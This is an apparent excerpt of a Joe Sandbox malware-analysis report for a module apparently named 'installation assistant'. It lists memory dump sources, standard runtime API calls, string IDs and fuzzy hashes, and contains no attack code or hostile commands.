                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: api-ms-$ext-ms-
                                    • API String ID: 0-537541572
                                    • Opcode ID: 5f59daaa7e12f37cea1f1b06bb2c4ee40a27fb1762432486da01b7a434977dcc
                                    • Instruction ID: ec7a78ed77cc2d5359a946ce81f0bf0a8cce925e597c0029b4c5c2ceb2767ddc
                                    • Opcode Fuzzy Hash: 5f59daaa7e12f37cea1f1b06bb2c4ee40a27fb1762432486da01b7a434977dcc
                                    • Instruction Fuzzy Hash: B521EE32A1A219AFDB318B29CC54B0F3B649F17768F2606D1E825F7A80DB30DD0085F0
                                    APIs
                                    • GetConsoleCP.KERNEL32(?,6C17B0D0,?), ref: 6C17BEF9
                                    • __fassign.LIBCMT ref: 6C17C0D8
                                    • __fassign.LIBCMT ref: 6C17C0F5
                                    • WriteFile.KERNEL32(?,6C185AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C17C13D
                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C17C17D
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C17C229
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ConsoleErrorLast
                                    • String ID:
                                    • API String ID: 4031098158-0
                                    • Opcode ID: 06ce2418d600c451a6b862ed5967815e6c1aeddf87e4d977f03e9347d1f59e57
                                    • Instruction ID: b4cb1aab28f0492a15f3b592c120777a13b57c572da75c2717811ca60fc4acf1
                                    • Opcode Fuzzy Hash: 06ce2418d600c451a6b862ed5967815e6c1aeddf87e4d977f03e9347d1f59e57
                                    • Instruction Fuzzy Hash: 4FD1AC75E012489FCF21DFE8C890AEDBBB5BF49314F24416AE855BB242D731A946CF60
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6C032F95
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6C032FAF
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6C032FD0
                                    • __Getctype.LIBCPMT ref: 6C033084
                                    • std::_Facet_Register.LIBCPMT ref: 6C03309C
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0330B7
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                    • String ID:
                                    • API String ID: 1102183713-0
                                    • Opcode ID: 6dee1a0e99ac83b0143fe7dadba8716b373804e15c4fbb9d03b2407b69ef199b
                                    • Instruction ID: b760842003ef29dd9c694e99bf037d2fb489ea839c017e03234616a22a521751
                                    • Opcode Fuzzy Hash: 6dee1a0e99ac83b0143fe7dadba8716b373804e15c4fbb9d03b2407b69ef199b
                                    • Instruction Fuzzy Hash: 11415871E002298FCB10CF86C864BAEB7F0FB49714F058129D859ABB90D735A945CFE0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv$__aullrem
                                    • String ID:
                                    • API String ID: 2022606265-0
                                    • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                    • Instruction ID: 980c2aa9b7b60f6f01f566c5f5c6182cdaa9a688c21477cdce5096516a1f9ce7
                                    • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                    • Instruction Fuzzy Hash: 8B21E17490462DFBDF208ED68E40DCF7F79EF51BA8F208226B92461A90D6718D51CAA1
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1AA6F1
                                      • Part of subcall function 6C1B9173: __EH_prolog.LIBCMT ref: 6C1B9178
                                    • __EH_prolog.LIBCMT ref: 6C1AA8F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: IJ$WIJ$J
                                    • API String ID: 3519838083-740443243
                                    • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                    • Instruction ID: a98f7eb18c482b1786142761f7f6bee19bf2e32a01398809fe075daf6475b3d6
                                    • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                    • Instruction Fuzzy Hash: 8E71AE34900255DFDB18DFA4C484BEDB7B5BF14308F1080A9D859ABB91CB79AA4ECF91
                                    APIs
                                    • _free.LIBCMT ref: 6C185ADD
                                    • _free.LIBCMT ref: 6C185B06
                                    • SetEndOfFile.KERNEL32(00000000,6C1846EC,00000000,6C17B0D0,?,?,?,?,?,?,?,6C1846EC,6C17B0D0,00000000), ref: 6C185B38
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C1846EC,6C17B0D0,00000000,?,?,?,?,00000000,?), ref: 6C185B54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFileLast
                                    • String ID: 8Q
                                    • API String ID: 1547350101-4022487301
                                    • Opcode ID: efc15d91400db206b03fb2c45fa8feb48fae8844d214638b1e2fa3fe6fc6a9fd
                                    • Instruction ID: a675ea6def47beebd9b626351842968d25b9109af2d5badca6c79b930ee1ab93
                                    • Opcode Fuzzy Hash: efc15d91400db206b03fb2c45fa8feb48fae8844d214638b1e2fa3fe6fc6a9fd
                                    • Instruction Fuzzy Hash: 2F41E73250A605ABFB019BA9CCC0BDE3BB6EF55328F240141F426E7B90DB38C8044F20
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1BE41D
                                      • Part of subcall function 6C1BEE40: __EH_prolog.LIBCMT ref: 6C1BEE45
                                      • Part of subcall function 6C1BE8EB: __EH_prolog.LIBCMT ref: 6C1BE8F0
                                      • Part of subcall function 6C1BE593: __EH_prolog.LIBCMT ref: 6C1BE598
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: &qB$0aJ$A0$XqB
                                    • API String ID: 3519838083-1326096578
                                    • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                    • Instruction ID: cba3a998ee0622b669978a1ad2804b5dca109f13092d5bf1e8cc65c0e477e5fe
                                    • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                    • Instruction Fuzzy Hash: 76218671D01258EECB08DBE4D994AEDBBB5AF25318F20406AE41677780DB781F0CCB62
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: J$0J$DJ$`J
                                    • API String ID: 3519838083-2453737217
                                    • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                    • Instruction ID: 5c2672b0739af91b2f074c69caccc37212cf2ebe23941b7b8616e5e1439addf7
                                    • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                    • Instruction Fuzzy Hash: B011B0B0900B648FC7209F5AC45469AFBE4BFA5708B10C95FC4AA97B50C7F8A509CB99
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C16F1B4,00000000,?,6C16F235,6C169C49,00000003,00000000), ref: 6C16F13F
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C16F152
                                    • FreeLibrary.KERNEL32(00000000,?,?,6C16F1B4,00000000,?,6C16F235,6C169C49,00000003,00000000), ref: 6C16F175
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: fe926a97b7b2a70e59522f55570393399a39bf2e1726c2a68da2d1a281d49313
                                    • Instruction ID: bfd003bb0e66ba72697e2e7723a300d4526e8054c3bb0d785a74b2b669aebca2
                                    • Opcode Fuzzy Hash: fe926a97b7b2a70e59522f55570393399a39bf2e1726c2a68da2d1a281d49313
                                    • Instruction Fuzzy Hash: 77F01C31601519FBDF029F92C90DB9E7A79EB067AAF214064F826A2550CB708E10EA91
                                    APIs
                                    • __EH_prolog3.LIBCMT ref: 6C16732E
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 6C167339
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6C1673A7
                                      • Part of subcall function 6C167230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C167248
                                    • std::locale::_Setgloballocale.LIBCPMT ref: 6C167354
                                    • _Yarn.LIBCPMT ref: 6C16736A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                    • String ID:
                                    • API String ID: 1088826258-0
                                    • Opcode ID: 3b6e47d8b99a7b426f169f07a273df7047b30f9dbec49847af42f47dbc99bee3
                                    • Instruction ID: 39f3c951b6ce12469f6feda033472cda66e7465944e299b869f04cbcd3e0b746
                                    • Opcode Fuzzy Hash: 3b6e47d8b99a7b426f169f07a273df7047b30f9dbec49847af42f47dbc99bee3
                                    • Instruction Fuzzy Hash: FA01DF75A002108BDB06DF22C858ABC77B1FF96304B15804ADC0297BC0CF34AA6ACFE1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: $!$@
                                    • API String ID: 3519838083-2517134481
                                    • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                    • Instruction ID: adb3246fe3c82fdb962d3cc4a0eede5cb150005512dcf6a57001e82097ec5603
                                    • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                    • Instruction Fuzzy Hash: 4A126C74A0564DDFDB04CFA4C490ADDBBB1BF09308F24846AE945EBB52DB34E945CBA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog__aulldiv
                                    • String ID: $SJ
                                    • API String ID: 4125985754-3948962906
                                    • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                    • Instruction ID: dc81c77298643bdeed03874748cf812d7f4539b83ec912e0fc2e4c54657c456a
                                    • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                    • Instruction Fuzzy Hash: CFB13BB1E00209DFCB14CF99C9949AEBBB1FF58314B60852EE419B7B50D734AA49CF50
                                    APIs
                                      • Part of subcall function 6C167327: __EH_prolog3.LIBCMT ref: 6C16732E
                                      • Part of subcall function 6C167327: std::_Lockit::_Lockit.LIBCPMT ref: 6C167339
                                      • Part of subcall function 6C167327: std::locale::_Setgloballocale.LIBCPMT ref: 6C167354
                                      • Part of subcall function 6C167327: _Yarn.LIBCPMT ref: 6C16736A
                                      • Part of subcall function 6C167327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C1673A7
                                      • Part of subcall function 6C032F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C032F95
                                      • Part of subcall function 6C032F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C032FAF
                                      • Part of subcall function 6C032F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C032FD0
                                      • Part of subcall function 6C032F60: __Getctype.LIBCPMT ref: 6C033084
                                      • Part of subcall function 6C032F60: std::_Facet_Register.LIBCPMT ref: 6C03309C
                                      • Part of subcall function 6C032F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0330B7
                                    • std::ios_base::_Addstd.LIBCPMT ref: 6C03211B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                    • API String ID: 3332196525-1866435925
                                    • Opcode ID: c4e335b18c07bbb31d31e6bb72535bf2f0ac2bd7203721199aa83c55ee3d8f86
                                    • Instruction ID: 586c4024c1f8dc90e8ac96e6d0cbe0e70f73480210fe4f4ea7e93ebedbc04967
                                    • Opcode Fuzzy Hash: c4e335b18c07bbb31d31e6bb72535bf2f0ac2bd7203721199aa83c55ee3d8f86
                                    • Instruction Fuzzy Hash: 6241B2B0A0031A9FDB00CF64C8457AEBBF0FF49318F149268E919AB791D775A985CBD0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: $CK$CK
                                    • API String ID: 3519838083-2957773085
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: 0$LrJ$x
                                    • API String ID: 3519838083-658305261
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1C4ECC
                                      • Part of subcall function 6C1AF58A: __EH_prolog.LIBCMT ref: 6C1AF58F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: :hJ$dJ$xJ
                                    • API String ID: 3519838083-2437443688
                                    APIs
                                    • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C17B0D0,6C031DEA,00008000,6C17B0D0,?,?,?,6C17AC7F,6C17B0D0,?,00000000,6C031DEA), ref: 6C17ADC9
                                    • GetLastError.KERNEL32(?,?,?,6C17AC7F,6C17B0D0,?,00000000,6C031DEA,?,6C18469E,6C17B0D0,000000FF,000000FF,00000002,00008000,6C17B0D0), ref: 6C17ADD3
                                    • __dosmaperr.LIBCMT ref: 6C17ADDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer__dosmaperr
                                    • String ID: 8Q
                                    • API String ID: 2336955059-4022487301
                                    APIs
                                    • AcquireSRWLockExclusive.KERNEL32(6C26466C,?,652EF5AA,6C03230E,6C26430C), ref: 6C166B07
                                    • ReleaseSRWLockExclusive.KERNEL32(6C26466C), ref: 6C166B3A
                                    • WakeAllConditionVariable.KERNEL32(6C264668), ref: 6C166B45
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                                    • String ID: lF&l
                                    • API String ID: 1466638765-2742667394
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <J$DJ$HJ$TJ$]
                                    • API String ID: 0-686860805
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    APIs
                                    • GetLastError.KERNEL32(00000008,?,00000000,6C178453), ref: 6C1749B7
                                    • _free.LIBCMT ref: 6C174A14
                                    • _free.LIBCMT ref: 6C174A4A
                                    • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6C174A55
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,?,6C1846EC,00000000,00000000,?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0), ref: 6C185ED1
                                    • GetLastError.KERNEL32(?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?,6C17B0D0,?,6C17BD1C,6C185AB6), ref: 6C185EDD
                                      • Part of subcall function 6C185F2E: CloseHandle.KERNEL32(FFFFFFFE,6C185EED,?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?,6C17B0D0), ref: 6C185F3E
                                    • ___initconout.LIBCMT ref: 6C185EED
